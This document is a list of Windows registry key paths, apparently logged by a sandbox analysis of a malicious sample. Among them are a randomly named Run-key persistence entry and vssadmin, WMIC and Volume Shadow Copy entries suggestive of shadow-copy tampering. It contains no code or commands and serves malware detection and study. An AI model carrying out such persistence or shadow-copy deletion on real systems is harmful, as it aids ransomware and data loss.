HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\LoadUserSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\AccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
HKEY_CURRENT_USER\Software\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaxSxSHashCount
HKEY_CURRENT_USER\Software\Classes\Interface\{75121952-E0D0-43E5-9380-1D80483ACF72}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{75121952-E0D0-43E5-9380-1D80483ACF72}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{75121952-E0D0-43E5-9380-1D80483ACF72}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}
HKEY_CURRENT_USER\Software\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{E357FCCD-A995-4576-B01F-234630154E96}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}
HKEY_CURRENT_USER\Software\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B824B49D-22AC-4161-AC8A-9916E8FA3F7F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_CLASSES_ROOT\CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPSampledIn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\qobyhffdhzmp201
HKEY_CURRENT_USER\Software\Classes\AppID\vssadmin.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\WOW64
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\MID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\SusClientId
HKEY_USERS\.DEFAULT\Control Panel\International\Geo
HKEY_USERS\.DEFAULT\Control Panel\International\Geo\Nation
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightUpdateTime
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Office\16.0\Common\Experiment
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\officeclicktorun
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Office\16.0\Common\Graphics
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\Software\Microsoft\MSDTC\Tracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_MISC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_CM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_TRACE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_SVC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_GATEWAY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_UI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_CONTACT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_UTIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_CLUSTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_RESOURCE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_TIP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_XA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_LOG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_MTXOCI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_ETWTRACE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_PROXY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_KTMRM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_VSSBACKUP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_PERFMON
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_TM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_LU
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Output
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Output\TraceFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Output\MemoryBufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Output\DebugOutEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SourcePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\DevicePath
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\VssAccessControl
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\vssvc.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\A544A85B
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A2C52-3EB9-470A-96E2-6C6D4570E40F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A2C52-3EB9-470A-96E2-6C6D4570E40F}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A2C52-3EB9-470A-96E2-6C6D4570E40F}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A2C52-3EB9-470A-96E2-6C6D4570E40F}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A2C52-3EB9-470A-96E2-6C6D4570E40F}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A2C52-3EB9-470A-96E2-6C6D4570E40F}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A2C52-3EB9-470A-96E2-6C6D4570E40F}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A2C52-3EB9-470A-96E2-6C6D4570E40F}\InprocHandler
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Settings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\IdleTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{DA9F41D4-1A5D-41D0-A614-6DFD78DF5D05}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{DA9F41D4-1A5D-41D0-A614-6DFD78DF5D05}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{DA9F41D4-1A5D-41D0-A614-6DFD78DF5D05}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InprocHandler
HKEY_LOCAL_MACHINE\SYSTEM\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Safeboot\Option
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\ASR Writer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Logging
HKEY_CURRENT_USER\Software\Classes\AppID\WMIC.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Log File Max Size
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\WMIC.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\file\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FILEPROTOCOL_NOFINDFIRST_KB947853
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FILEPROTOCOL_NOFINDFIRST_KB947853
HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
